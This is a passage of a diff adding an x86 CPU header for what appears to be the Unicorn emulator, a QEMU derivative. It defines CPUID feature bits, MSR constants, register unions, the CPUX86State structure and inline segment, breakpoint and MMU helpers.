MSR_FSBASE 0xc0000100 +#define MSR_GSBASE 0xc0000101 +#define MSR_KERNELGSBASE 0xc0000102 +#define MSR_TSC_AUX 0xc0000103 + +#define MSR_VM_HSAVE_PA 0xc0010117 + +#define MSR_IA32_BNDCFGS 0x00000d90 + +#define XSTATE_FP (1ULL << 0) +#define XSTATE_SSE (1ULL << 1) +#define XSTATE_YMM (1ULL << 2) +#define XSTATE_BNDREGS (1ULL << 3) +#define XSTATE_BNDCSR (1ULL << 4) +#define XSTATE_OPMASK (1ULL << 5) +#define XSTATE_ZMM_Hi256 (1ULL << 6) +#define XSTATE_Hi16_ZMM (1ULL << 7) + + +/* CPUID feature words */ +typedef enum FeatureWord { + FEAT_1_EDX, /* CPUID[1].EDX */ + FEAT_1_ECX, /* CPUID[1].ECX */ + FEAT_7_0_EBX, /* CPUID[EAX=7,ECX=0].EBX */ + FEAT_8000_0001_EDX, /* CPUID[8000_0001].EDX */ + FEAT_8000_0001_ECX, /* 
CPUID[8000_0001].ECX */ + FEAT_8000_0007_EDX, /* CPUID[8000_0007].EDX */ + FEAT_C000_0001_EDX, /* CPUID[C000_0001].EDX */ + FEAT_KVM, /* CPUID[4000_0001].EAX (KVM_CPUID_FEATURES) */ + FEAT_SVM, /* CPUID[8000_000A].EDX */ + FEATURE_WORDS, +} FeatureWord; + +typedef uint32_t FeatureWordArray[FEATURE_WORDS]; + +/* cpuid_features bits */ +#define CPUID_FP87 (1U << 0) +#define CPUID_VME (1U << 1) +#define CPUID_DE (1U << 2) +#define CPUID_PSE (1U << 3) +#define CPUID_TSC (1U << 4) +#define CPUID_MSR (1U << 5) +#define CPUID_PAE (1U << 6) +#define CPUID_MCE (1U << 7) +#define CPUID_CX8 (1U << 8) +#define CPUID_APIC (1U << 9) +#define CPUID_SEP (1U << 11) /* sysenter/sysexit */ +#define CPUID_MTRR (1U << 12) +#define CPUID_PGE (1U << 13) +#define CPUID_MCA (1U << 14) +#define CPUID_CMOV (1U << 15) +#define CPUID_PAT (1U << 16) +#define CPUID_PSE36 (1U << 17) +#define CPUID_PN (1U << 18) +#define CPUID_CLFLUSH (1U << 19) +#define CPUID_DTS (1U << 21) +#define CPUID_ACPI (1U << 22) +#define CPUID_MMX (1U << 23) +#define CPUID_FXSR (1U << 24) +#define CPUID_SSE (1U << 25) +#define CPUID_SSE2 (1U << 26) +#define CPUID_SS (1U << 27) +#define CPUID_HT (1U << 28) +#define CPUID_TM (1U << 29) +#define CPUID_IA64 (1U << 30) +#define CPUID_PBE (1U << 31) + +#define CPUID_EXT_SSE3 (1U << 0) +#define CPUID_EXT_PCLMULQDQ (1U << 1) +#define CPUID_EXT_DTES64 (1U << 2) +#define CPUID_EXT_MONITOR (1U << 3) +#define CPUID_EXT_DSCPL (1U << 4) +#define CPUID_EXT_VMX (1U << 5) +#define CPUID_EXT_SMX (1U << 6) +#define CPUID_EXT_EST (1U << 7) +#define CPUID_EXT_TM2 (1U << 8) +#define CPUID_EXT_SSSE3 (1U << 9) +#define CPUID_EXT_CID (1U << 10) +#define CPUID_EXT_FMA (1U << 12) +#define CPUID_EXT_CX16 (1U << 13) +#define CPUID_EXT_XTPR (1U << 14) +#define CPUID_EXT_PDCM (1U << 15) +#define CPUID_EXT_PCID (1U << 17) +#define CPUID_EXT_DCA (1U << 18) +#define CPUID_EXT_SSE41 (1U << 19) +#define CPUID_EXT_SSE42 (1U << 20) +#define CPUID_EXT_X2APIC (1U << 21) +#define CPUID_EXT_MOVBE (1U << 22) 
+#define CPUID_EXT_POPCNT (1U << 23) +#define CPUID_EXT_TSC_DEADLINE_TIMER (1U << 24) +#define CPUID_EXT_AES (1U << 25) +#define CPUID_EXT_XSAVE (1U << 26) +#define CPUID_EXT_OSXSAVE (1U << 27) +#define CPUID_EXT_AVX (1U << 28) +#define CPUID_EXT_F16C (1U << 29) +#define CPUID_EXT_RDRAND (1U << 30) +#define CPUID_EXT_HYPERVISOR (1U << 31) + +#define CPUID_EXT2_FPU (1U << 0) +#define CPUID_EXT2_VME (1U << 1) +#define CPUID_EXT2_DE (1U << 2) +#define CPUID_EXT2_PSE (1U << 3) +#define CPUID_EXT2_TSC (1U << 4) +#define CPUID_EXT2_MSR (1U << 5) +#define CPUID_EXT2_PAE (1U << 6) +#define CPUID_EXT2_MCE (1U << 7) +#define CPUID_EXT2_CX8 (1U << 8) +#define CPUID_EXT2_APIC (1U << 9) +#define CPUID_EXT2_SYSCALL (1U << 11) +#define CPUID_EXT2_MTRR (1U << 12) +#define CPUID_EXT2_PGE (1U << 13) +#define CPUID_EXT2_MCA (1U << 14) +#define CPUID_EXT2_CMOV (1U << 15) +#define CPUID_EXT2_PAT (1U << 16) +#define CPUID_EXT2_PSE36 (1U << 17) +#define CPUID_EXT2_MP (1U << 19) +#define CPUID_EXT2_NX (1U << 20) +#define CPUID_EXT2_MMXEXT (1U << 22) +#define CPUID_EXT2_MMX (1U << 23) +#define CPUID_EXT2_FXSR (1U << 24) +#define CPUID_EXT2_FFXSR (1U << 25) +#define CPUID_EXT2_PDPE1GB (1U << 26) +#define CPUID_EXT2_RDTSCP (1U << 27) +#define CPUID_EXT2_LM (1U << 29) +#define CPUID_EXT2_3DNOWEXT (1U << 30) +#define CPUID_EXT2_3DNOW (1U << 31) + +/* CPUID[8000_0001].EDX bits that are aliases of CPUID[1].EDX bits on AMD CPUs */ +#define CPUID_EXT2_AMD_ALIASES (CPUID_EXT2_FPU | CPUID_EXT2_VME | \ + CPUID_EXT2_DE | CPUID_EXT2_PSE | \ + CPUID_EXT2_TSC | CPUID_EXT2_MSR | \ + CPUID_EXT2_PAE | CPUID_EXT2_MCE | \ + CPUID_EXT2_CX8 | CPUID_EXT2_APIC | \ + CPUID_EXT2_MTRR | CPUID_EXT2_PGE | \ + CPUID_EXT2_MCA | CPUID_EXT2_CMOV | \ + CPUID_EXT2_PAT | CPUID_EXT2_PSE36 | \ + CPUID_EXT2_MMX | CPUID_EXT2_FXSR) + +#define CPUID_EXT3_LAHF_LM (1U << 0) +#define CPUID_EXT3_CMP_LEG (1U << 1) +#define CPUID_EXT3_SVM (1U << 2) +#define CPUID_EXT3_EXTAPIC (1U << 3) +#define CPUID_EXT3_CR8LEG (1U << 4) +#define
CPUID_EXT3_ABM (1U << 5) +#define CPUID_EXT3_SSE4A (1U << 6) +#define CPUID_EXT3_MISALIGNSSE (1U << 7) +#define CPUID_EXT3_3DNOWPREFETCH (1U << 8) +#define CPUID_EXT3_OSVW (1U << 9) +#define CPUID_EXT3_IBS (1U << 10) +#define CPUID_EXT3_XOP (1U << 11) +#define CPUID_EXT3_SKINIT (1U << 12) +#define CPUID_EXT3_WDT (1U << 13) +#define CPUID_EXT3_LWP (1U << 15) +#define CPUID_EXT3_FMA4 (1U << 16) +#define CPUID_EXT3_TCE (1U << 17) +#define CPUID_EXT3_NODEID (1U << 19) +#define CPUID_EXT3_TBM (1U << 21) +#define CPUID_EXT3_TOPOEXT (1U << 22) +#define CPUID_EXT3_PERFCORE (1U << 23) +#define CPUID_EXT3_PERFNB (1U << 24) + +#define CPUID_SVM_NPT (1U << 0) +#define CPUID_SVM_LBRV (1U << 1) +#define CPUID_SVM_SVMLOCK (1U << 2) +#define CPUID_SVM_NRIPSAVE (1U << 3) +#define CPUID_SVM_TSCSCALE (1U << 4) +#define CPUID_SVM_VMCBCLEAN (1U << 5) +#define CPUID_SVM_FLUSHASID (1U << 6) +#define CPUID_SVM_DECODEASSIST (1U << 7) +#define CPUID_SVM_PAUSEFILTER (1U << 10) +#define CPUID_SVM_PFTHRESHOLD (1U << 12) + +#define CPUID_7_0_EBX_FSGSBASE (1U << 0) +#define CPUID_7_0_EBX_BMI1 (1U << 3) +#define CPUID_7_0_EBX_HLE (1U << 4) +#define CPUID_7_0_EBX_AVX2 (1U << 5) +#define CPUID_7_0_EBX_SMEP (1U << 7) +#define CPUID_7_0_EBX_BMI2 (1U << 8) +#define CPUID_7_0_EBX_ERMS (1U << 9) +#define CPUID_7_0_EBX_INVPCID (1U << 10) +#define CPUID_7_0_EBX_RTM (1U << 11) +#define CPUID_7_0_EBX_MPX (1U << 14) +#define CPUID_7_0_EBX_AVX512F (1U << 16) /* AVX-512 Foundation */ +#define CPUID_7_0_EBX_RDSEED (1U << 18) +#define CPUID_7_0_EBX_ADX (1U << 19) +#define CPUID_7_0_EBX_SMAP (1U << 20) +#define CPUID_7_0_EBX_AVX512PF (1U << 26) /* AVX-512 Prefetch */ +#define CPUID_7_0_EBX_AVX512ER (1U << 27) /* AVX-512 Exponential and Reciprocal */ +#define CPUID_7_0_EBX_AVX512CD (1U << 28) /* AVX-512 Conflict Detection */ + +/* CPUID[0x80000007].EDX flags: */ +#define CPUID_APM_INVTSC (1U << 8) + +#define CPUID_VENDOR_SZ 12 + +#define CPUID_VENDOR_INTEL_1 0x756e6547 /* "Genu" */ +#define CPUID_VENDOR_INTEL_2 
0x49656e69 /* "ineI" */ +#define CPUID_VENDOR_INTEL_3 0x6c65746e /* "ntel" */ +#define CPUID_VENDOR_INTEL "GenuineIntel" + +#define CPUID_VENDOR_AMD_1 0x68747541 /* "Auth" */ +#define CPUID_VENDOR_AMD_2 0x69746e65 /* "enti" */ +#define CPUID_VENDOR_AMD_3 0x444d4163 /* "cAMD" */ +#define CPUID_VENDOR_AMD "AuthenticAMD" + +#define CPUID_VENDOR_VIA "CentaurHauls" + +#define CPUID_MWAIT_IBE (1U << 1) /* Interrupts can exit capability */ +#define CPUID_MWAIT_EMX (1U << 0) /* enumeration supported */ + +#ifndef HYPERV_SPINLOCK_NEVER_RETRY +#define HYPERV_SPINLOCK_NEVER_RETRY 0xFFFFFFFF +#endif + +#define EXCP00_DIVZ 0 +#define EXCP01_DB 1 +#define EXCP02_NMI 2 +#define EXCP03_INT3 3 +#define EXCP04_INTO 4 +#define EXCP05_BOUND 5 +#define EXCP06_ILLOP 6 +#define EXCP07_PREX 7 +#define EXCP08_DBLE 8 +#define EXCP09_XERR 9 +#define EXCP0A_TSS 10 +#define EXCP0B_NOSEG 11 +#define EXCP0C_STACK 12 +#define EXCP0D_GPF 13 +#define EXCP0E_PAGE 14 +#define EXCP10_COPR 16 +#define EXCP11_ALGN 17 +#define EXCP12_MCHK 18 + +#define EXCP_SYSCALL 0x100 /* only happens in user only emulation + for syscall instruction */ + +/* i386-specific interrupt pending bits. */ +#define CPU_INTERRUPT_POLL CPU_INTERRUPT_TGT_EXT_1 +#define CPU_INTERRUPT_SMI CPU_INTERRUPT_TGT_EXT_2 +#define CPU_INTERRUPT_NMI CPU_INTERRUPT_TGT_EXT_3 +#define CPU_INTERRUPT_MCE CPU_INTERRUPT_TGT_EXT_4 +#define CPU_INTERRUPT_VIRQ CPU_INTERRUPT_TGT_INT_0 +#define CPU_INTERRUPT_SIPI CPU_INTERRUPT_TGT_INT_1 +#define CPU_INTERRUPT_TPR CPU_INTERRUPT_TGT_INT_2 + +/* Use a clearer name for this. 
*/ +#define CPU_INTERRUPT_INIT CPU_INTERRUPT_RESET + +typedef enum { + CC_OP_DYNAMIC, /* must use dynamic code to get cc_op */ + CC_OP_EFLAGS, /* all cc are explicitly computed, CC_SRC = flags */ + + CC_OP_MULB, /* modify all flags, C, O = (CC_SRC != 0) */ + CC_OP_MULW, + CC_OP_MULL, + CC_OP_MULQ, + + CC_OP_ADDB, /* modify all flags, CC_DST = res, CC_SRC = src1 */ + CC_OP_ADDW, + CC_OP_ADDL, + CC_OP_ADDQ, + + CC_OP_ADCB, /* modify all flags, CC_DST = res, CC_SRC = src1 */ + CC_OP_ADCW, + CC_OP_ADCL, + CC_OP_ADCQ, + + CC_OP_SUBB, /* modify all flags, CC_DST = res, CC_SRC = src1 */ + CC_OP_SUBW, + CC_OP_SUBL, + CC_OP_SUBQ, + + CC_OP_SBBB, /* modify all flags, CC_DST = res, CC_SRC = src1 */ + CC_OP_SBBW, + CC_OP_SBBL, + CC_OP_SBBQ, + + CC_OP_LOGICB, /* modify all flags, CC_DST = res */ + CC_OP_LOGICW, + CC_OP_LOGICL, + CC_OP_LOGICQ, + + CC_OP_INCB, /* modify all flags except, CC_DST = res, CC_SRC = C */ + CC_OP_INCW, + CC_OP_INCL, + CC_OP_INCQ, + + CC_OP_DECB, /* modify all flags except, CC_DST = res, CC_SRC = C */ + CC_OP_DECW, + CC_OP_DECL, + CC_OP_DECQ, + + CC_OP_SHLB, /* modify all flags, CC_DST = res, CC_SRC.msb = C */ + CC_OP_SHLW, + CC_OP_SHLL, + CC_OP_SHLQ, + + CC_OP_SARB, /* modify all flags, CC_DST = res, CC_SRC.lsb = C */ + CC_OP_SARW, + CC_OP_SARL, + CC_OP_SARQ, + + CC_OP_BMILGB, /* Z,S via CC_DST, C = SRC==0; O=0; P,A undefined */ + CC_OP_BMILGW, + CC_OP_BMILGL, + CC_OP_BMILGQ, + + CC_OP_ADCX, /* CC_DST = C, CC_SRC = rest. */ + CC_OP_ADOX, /* CC_DST = O, CC_SRC = rest. */ + CC_OP_ADCOX, /* CC_DST = C, CC_SRC2 = O, CC_SRC = rest. */ + + CC_OP_CLR, /* Z set, all other flags clear. 
*/ + + CC_OP_NB, +} CCOp; + +typedef struct SegmentCache { + uint32_t selector; + target_ulong base; + uint32_t limit; + uint32_t flags; +} SegmentCache; + +typedef union { + uint8_t _b[16]; + uint16_t _w[8]; + uint32_t _l[4]; + uint64_t _q[2]; + float32 _s[4]; + float64 _d[2]; +} XMMReg; + +typedef union { + uint8_t _b[32]; + uint16_t _w[16]; + uint32_t _l[8]; + uint64_t _q[4]; + float32 _s[8]; + float64 _d[4]; +} YMMReg; + +typedef union { + uint8_t _b[64]; + uint16_t _w[32]; + uint32_t _l[16]; + uint64_t _q[8]; + float32 _s[16]; + float64 _d[8]; +} ZMMReg; + +typedef union { + uint8_t _b[8]; + uint16_t _w[4]; + uint32_t _l[2]; + float32 _s[2]; + uint64_t q; +} MMXReg; + +typedef struct BNDReg { + uint64_t lb; + uint64_t ub; +} BNDReg; + +typedef struct BNDCSReg { + uint64_t cfgu; + uint64_t sts; +} BNDCSReg; + +#ifdef HOST_WORDS_BIGENDIAN +#define ZMM_B(n) _b[63 - (n)] +#define ZMM_W(n) _w[31 - (n)] +#define ZMM_L(n) _l[15 - (n)] +#define ZMM_S(n) _s[15 - (n)] +#define ZMM_Q(n) _q[7 - (n)] +#define ZMM_D(n) _d[7 - (n)] + +#define YMM_B(n) _b[31 - (n)] +#define YMM_W(n) _w[15 - (n)] +#define YMM_L(n) _l[7 - (n)] +#define YMM_S(n) _s[7 - (n)] +#define YMM_Q(n) _q[3 - (n)] +#define YMM_D(n) _d[3 - (n)] + +#define XMM_B(n) _b[15 - (n)] +#define XMM_W(n) _w[7 - (n)] +#define XMM_L(n) _l[3 - (n)] +#define XMM_S(n) _s[3 - (n)] +#define XMM_Q(n) _q[1 - (n)] +#define XMM_D(n) _d[1 - (n)] + +#define MMX_B(n) _b[7 - (n)] +#define MMX_W(n) _w[3 - (n)] +#define MMX_L(n) _l[1 - (n)] +#define MMX_S(n) _s[1 - (n)] +#else +#define ZMM_B(n) _b[n] +#define ZMM_W(n) _w[n] +#define ZMM_L(n) _l[n] +#define ZMM_S(n) _s[n] +#define ZMM_Q(n) _q[n] +#define ZMM_D(n) _d[n] + +#define YMM_B(n) _b[n] +#define YMM_W(n) _w[n] +#define YMM_L(n) _l[n] +#define YMM_S(n) _s[n] +#define YMM_Q(n) _q[n] +#define YMM_D(n) _d[n] + +#define XMM_B(n) _b[n] +#define XMM_W(n) _w[n] +#define XMM_L(n) _l[n] +#define XMM_S(n) _s[n] +#define XMM_Q(n) _q[n] +#define XMM_D(n) _d[n] + +#define MMX_B(n) _b[n] 
+#define MMX_W(n) _w[n] +#define MMX_L(n) _l[n] +#define MMX_S(n) _s[n] +#endif +#define MMX_Q(n) q + +typedef union { + floatx80 QEMU_ALIGN(16, d); + MMXReg mmx; +} FPReg; + +typedef struct { + uint64_t base; + uint64_t mask; +} MTRRVar; + +#define CPU_NB_REGS64 16 +#define CPU_NB_REGS32 8 + +#ifdef TARGET_X86_64 +#define CPU_NB_REGS CPU_NB_REGS64 +#else +#define CPU_NB_REGS CPU_NB_REGS32 +#endif + +#define MAX_FIXED_COUNTERS 3 +#define MAX_GP_COUNTERS (MSR_IA32_PERF_STATUS - MSR_P6_EVNTSEL0) + +#define NB_MMU_MODES 3 + +#define NB_OPMASK_REGS 8 + +typedef enum TPRAccess { + TPR_ACCESS_READ, + TPR_ACCESS_WRITE, +} TPRAccess; + +typedef struct CPUX86State { + /* standard registers */ + target_ulong regs[CPU_NB_REGS]; + target_ulong eip; + target_ulong eflags0; // copy of eflags that does not change thru the BB + target_ulong eflags; /* eflags register. During CPU emulation, CC + flags and DF are set to zero because they are + stored elsewhere */ + + /* emulator internal eflags handling */ + target_ulong cc_dst; + target_ulong cc_src; + target_ulong cc_src2; + uint32_t cc_op; + int32_t df; /* D flag : 1 if D = 0, -1 if D = 1 */ + uint32_t hflags; /* TB flags, see HF_xxx constants. These flags + are known at translation time. */ + uint32_t hflags2; /* various other flags, see HF2_xxx constants. */ + + /* segments */ + SegmentCache segs[6]; /* selector values */ + SegmentCache ldt; + SegmentCache tr; + SegmentCache gdt; /* only base and limit are used */ + SegmentCache idt; /* only base and limit are used */ + + target_ulong cr[5]; /* NOTE: cr1 is unused */ + int32_t a20_mask; + + BNDReg bnd_regs[4]; + BNDCSReg bndcs_regs; + uint64_t msr_bndcfgs; + + /* Beginning of state preserved by INIT (dummy marker). 
*/ + //struct {} start_init_save; + int start_init_save; + + /* FPU state */ + unsigned int fpstt; /* top of stack index */ + uint16_t fpus; + uint16_t fpuc; + uint8_t fptags[8]; /* 0 = valid, 1 = empty */ + FPReg fpregs[8]; + /* KVM-only so far */ + uint16_t fpop; + uint64_t fpip; + uint64_t fpdp; + + /* emulator internal variables */ + float_status fp_status; + floatx80 ft0; + + float_status mmx_status; /* for 3DNow! float ops */ + float_status sse_status; + uint32_t mxcsr; + XMMReg xmm_regs[CPU_NB_REGS]; + XMMReg xmm_t0; + MMXReg mmx_t0; + + XMMReg ymmh_regs[CPU_NB_REGS]; + + uint64_t opmask_regs[NB_OPMASK_REGS]; + YMMReg zmmh_regs[CPU_NB_REGS]; +#ifdef TARGET_X86_64 + ZMMReg hi16_zmm_regs[CPU_NB_REGS]; +#endif + + /* sysenter registers */ + uint32_t sysenter_cs; + target_ulong sysenter_esp; + target_ulong sysenter_eip; + uint64_t efer; + uint64_t star; + + uint64_t vm_hsave; + +#ifdef TARGET_X86_64 + target_ulong lstar; + target_ulong cstar; + target_ulong fmask; + target_ulong kernelgsbase; +#endif + + uint64_t tsc; + uint64_t tsc_adjust; + uint64_t tsc_deadline; + + uint64_t mcg_status; + uint64_t msr_ia32_misc_enable; + uint64_t msr_ia32_feature_control; + + uint64_t msr_fixed_ctr_ctrl; + uint64_t msr_global_ctrl; + uint64_t msr_global_status; + uint64_t msr_global_ovf_ctrl; + uint64_t msr_fixed_counters[MAX_FIXED_COUNTERS]; + uint64_t msr_gp_counters[MAX_GP_COUNTERS]; + uint64_t msr_gp_evtsel[MAX_GP_COUNTERS]; + + uint64_t pat; + uint32_t smbase; + + /* End of state preserved by INIT (dummy marker). 
*/ + //struct {} end_init_save; + int end_init_save; + + uint64_t system_time_msr; + uint64_t wall_clock_msr; + uint64_t steal_time_msr; + uint64_t async_pf_en_msr; + uint64_t pv_eoi_en_msr; + + uint64_t msr_hv_hypercall; + uint64_t msr_hv_guest_os_id; + uint64_t msr_hv_vapic; + uint64_t msr_hv_tsc; + + /* exception/interrupt handling */ + int error_code; + int exception_is_int; + target_ulong exception_next_eip; + target_ulong dr[8]; /* debug registers */ + union { + struct CPUBreakpoint *cpu_breakpoint[4]; + struct CPUWatchpoint *cpu_watchpoint[4]; + }; /* break/watchpoints for dr[0..3] */ + int old_exception; /* exception in flight */ + + uint64_t vm_vmcb; + uint64_t tsc_offset; + uint64_t intercept; + uint16_t intercept_cr_read; + uint16_t intercept_cr_write; + uint16_t intercept_dr_read; + uint16_t intercept_dr_write; + uint32_t intercept_exceptions; + uint8_t v_tpr; + + /* KVM states, automatically cleared on reset */ + uint8_t nmi_injected; + uint8_t nmi_pending; + + CPU_COMMON + + /* Fields from here on are preserved across CPU reset. */ + + /* processor features (e.g. 
for CPUID insn) */ + uint32_t cpuid_level; + uint32_t cpuid_xlevel; + uint32_t cpuid_xlevel2; + uint32_t cpuid_vendor1; + uint32_t cpuid_vendor2; + uint32_t cpuid_vendor3; + uint32_t cpuid_version; + FeatureWordArray features; + uint32_t cpuid_model[12]; + uint32_t cpuid_apic_id; + + /* MTRRs */ + uint64_t mtrr_fixed[11]; + uint64_t mtrr_deftype; + MTRRVar mtrr_var[MSR_MTRRcap_VCNT]; + + /* For KVM */ + uint32_t mp_state; + int32_t exception_injected; + int32_t interrupt_injected; + uint8_t soft_interrupt; + uint8_t has_error_code; + uint32_t sipi_vector; + bool tsc_valid; + int tsc_khz; + void *kvm_xsave_buf; + + uint64_t mcg_cap; + uint64_t mcg_ctl; + uint64_t mce_banks[MCE_BANKS_DEF*4]; + + uint64_t tsc_aux; + + /* vmstate */ + uint16_t fpus_vmstate; + uint16_t fptag_vmstate; + uint16_t fpregs_format_vmstate; + uint64_t xstate_bv; + + uint64_t xcr0; + + TPRAccess tpr_access_type; + + // Unicorn engine + struct uc_struct *uc; +} CPUX86State; + +#include "cpu-qom.h" + +X86CPU *cpu_x86_init(struct uc_struct *uc, const char *cpu_model); +X86CPU *cpu_x86_create(struct uc_struct *uc, const char *cpu_model, Error **errp); +int cpu_x86_exec(struct uc_struct *uc, CPUX86State *s); +void x86_cpudef_setup(void); +int cpu_x86_support_mca_broadcast(CPUX86State *env); + +int cpu_get_pic_interrupt(CPUX86State *s); +/* MSDOS compatibility mode FPU exception support */ +void cpu_set_ferr(CPUX86State *s); + +/* this function must always be used to load data in the segment + cache: it synchronizes the hflags with the segment cache values */ +static inline void cpu_x86_load_seg_cache(CPUX86State *env, + int seg_reg, unsigned int selector, + target_ulong base, + unsigned int limit, + unsigned int flags) +{ + SegmentCache *sc; + unsigned int new_hflags; + + sc = &env->segs[seg_reg]; + sc->selector = selector; + sc->base = base; + sc->limit = limit; + sc->flags = flags; + + /* update the hidden flags */ + { + if (seg_reg == R_CS) { +#ifdef TARGET_X86_64 + if ((env->hflags & 
HF_LMA_MASK) && (flags & DESC_L_MASK)) { + /* long mode */ + env->hflags |= HF_CS32_MASK | HF_SS32_MASK | HF_CS64_MASK; + env->hflags &= ~(HF_ADDSEG_MASK); + } else +#endif + { + /* legacy / compatibility case */ + new_hflags = (env->segs[R_CS].flags & DESC_B_MASK) + >> (DESC_B_SHIFT - HF_CS32_SHIFT); + env->hflags = (env->hflags & ~(HF_CS32_MASK | HF_CS64_MASK)) | + new_hflags; + } + } + if (seg_reg == R_SS) { + int cpl = (flags >> DESC_DPL_SHIFT) & 3; +#if HF_CPL_MASK != 3 +#error HF_CPL_MASK is hardcoded +#endif + env->hflags = (env->hflags & ~HF_CPL_MASK) | cpl; + } + new_hflags = (env->segs[R_SS].flags & DESC_B_MASK) + >> (DESC_B_SHIFT - HF_SS32_SHIFT); + if (env->hflags & HF_CS64_MASK) { + /* zero base assumed for DS, ES and SS in long mode */ + } else if (!(env->cr[0] & CR0_PE_MASK) || + (env->eflags & VM_MASK) || + !(env->hflags & HF_CS32_MASK)) { + /* XXX: try to avoid this test. The problem comes from the + fact that in real mode or vm86 mode we only modify the + 'base' and 'selector' fields of the segment cache to go + faster. A solution may be to force addseg to one in + translate-i386.c.
*/ + new_hflags |= HF_ADDSEG_MASK; + } else { + new_hflags |= ((env->segs[R_DS].base | + env->segs[R_ES].base | + env->segs[R_SS].base) != 0) << + HF_ADDSEG_SHIFT; + } + env->hflags = (env->hflags & + ~(HF_SS32_MASK | HF_ADDSEG_MASK)) | new_hflags; + } +} + +static inline void cpu_x86_load_seg_cache_sipi(X86CPU *cpu, + uint8_t sipi_vector) +{ + CPUState *cs = CPU(cpu); + CPUX86State *env = &cpu->env; + + env->eip = 0; + cpu_x86_load_seg_cache(env, R_CS, sipi_vector << 8, + sipi_vector << 12, + env->segs[R_CS].limit, + env->segs[R_CS].flags); + cs->halted = 0; +} + +int cpu_x86_get_descr_debug(CPUX86State *env, unsigned int selector, + target_ulong *base, unsigned int *limit, + unsigned int *flags); + +/* op_helper.c */ +/* used for debug or cpu save/restore */ +void cpu_get_fp80(uint64_t *pmant, uint16_t *pexp, floatx80 f); +floatx80 cpu_set_fp80(uint64_t mant, uint16_t upper); + +/* cpu-exec.c */ +/* the following helpers are only usable in user mode simulation as + they can trigger unexpected exceptions */ +void cpu_x86_load_seg(CPUX86State *s, int seg_reg, int selector); +void cpu_x86_fsave(CPUX86State *s, target_ulong ptr, int data32); +void cpu_x86_frstor(CPUX86State *s, target_ulong ptr, int data32); + +/* the binding language can not catch the exceptions. + check the arguments, return error instead of raise exceptions. */ +int uc_check_cpu_x86_load_seg(CPUX86State *env, int seg_reg, int sel); + +/* you can call this signal handler from your SIGBUS and SIGSEGV + signal handlers to inform the virtual CPU of exceptions. non zero + is returned if the signal was handled by the virtual CPU. 
*/ +int cpu_x86_signal_handler(int host_signum, void *pinfo, + void *puc); + +/* cpuid.c */ +void cpu_x86_cpuid(CPUX86State *env, uint32_t index, uint32_t count, + uint32_t *eax, uint32_t *ebx, + uint32_t *ecx, uint32_t *edx); +void cpu_clear_apic_feature(CPUX86State *env); +void host_cpuid(uint32_t function, uint32_t count, + uint32_t *eax, uint32_t *ebx, uint32_t *ecx, uint32_t *edx); + +/* helper.c */ +int x86_cpu_handle_mmu_fault(CPUState *cpu, vaddr addr, + int is_write, int mmu_idx); +void x86_cpu_set_a20(X86CPU *cpu, int a20_state); + +static inline bool hw_local_breakpoint_enabled(unsigned long dr7, int index) +{ + return (dr7 >> (index * 2)) & 1; +} + +static inline bool hw_global_breakpoint_enabled(unsigned long dr7, int index) +{ + return (dr7 >> (index * 2)) & 2; + +} +static inline bool hw_breakpoint_enabled(unsigned long dr7, int index) +{ + return hw_global_breakpoint_enabled(dr7, index) || + hw_local_breakpoint_enabled(dr7, index); +} + +static inline int hw_breakpoint_type(unsigned long dr7, int index) +{ + return (dr7 >> (DR7_TYPE_SHIFT + (index * 4))) & 3; +} + +static inline int hw_breakpoint_len(unsigned long dr7, int index) +{ + int len = ((dr7 >> (DR7_LEN_SHIFT + (index * 4))) & 3); + return (len == 2) ? 8 : len + 1; +} + +void hw_breakpoint_insert(CPUX86State *env, int index); +void hw_breakpoint_remove(CPUX86State *env, int index); +bool check_hw_breakpoints(CPUX86State *env, bool force_dr6_update); +void breakpoint_handler(CPUState *cs); + +/* will be suppressed */ +void cpu_x86_update_cr0(CPUX86State *env, uint32_t new_cr0); +void cpu_x86_update_cr3(CPUX86State *env, target_ulong new_cr3); +void cpu_x86_update_cr4(CPUX86State *env, uint32_t new_cr4); + +/* hw/pc.c */ +void cpu_smm_update(CPUX86State *env); +uint64_t cpu_get_tsc(CPUX86State *env); + +#define TARGET_PAGE_BITS 12 + +#ifdef TARGET_X86_64 +#define TARGET_PHYS_ADDR_SPACE_BITS 52 +/* ??? 
This is really 48 bits, sign-extended, but the only thing + accessible to userland with bit 48 set is the VSYSCALL, and that + is handled via other mechanisms. */ +#define TARGET_VIRT_ADDR_SPACE_BITS 47 +#else +#define TARGET_PHYS_ADDR_SPACE_BITS 36 +#define TARGET_VIRT_ADDR_SPACE_BITS 32 +#endif + +/* XXX: This value should match the one returned by CPUID + * and in exec.c */ +# if defined(TARGET_X86_64) +# define PHYS_ADDR_MASK 0xffffffffffLL +# else +# define PHYS_ADDR_MASK 0xfffffffffLL +# endif + +static inline CPUX86State *cpu_init(struct uc_struct *uc, const char *cpu_model) +{ + X86CPU *cpu = cpu_x86_init(uc, cpu_model); + if (cpu == NULL) { + return NULL; + } + return &cpu->env; +} + +#ifdef TARGET_I386 +#define cpu_exec cpu_x86_exec +#define cpu_gen_code cpu_x86_gen_code +#define cpu_signal_handler cpu_x86_signal_handler +#define cpudef_setup x86_cpudef_setup +#endif + +/* MMU modes definitions */ +#define MMU_MODE0_SUFFIX _ksmap +#define MMU_MODE1_SUFFIX _user +#define MMU_MODE2_SUFFIX _knosmap /* SMAP disabled or CPL<3 && AC=1 */ +#define MMU_KSMAP_IDX 0 +#define MMU_USER_IDX 1 +#define MMU_KNOSMAP_IDX 2 +static inline int cpu_mmu_index(CPUX86State *env) +{ + return (env->hflags & HF_CPL_MASK) == 3 ? MMU_USER_IDX : + (!(env->hflags & HF_SMAP_MASK) || (env->eflags & AC_MASK)) + ? MMU_KNOSMAP_IDX : MMU_KSMAP_IDX; +} + +static inline int cpu_mmu_index_kernel(CPUX86State *env) +{ + return !(env->hflags & HF_SMAP_MASK) ? MMU_KNOSMAP_IDX : + ((env->hflags & HF_CPL_MASK) < 3 && (env->eflags & AC_MASK)) + ? 
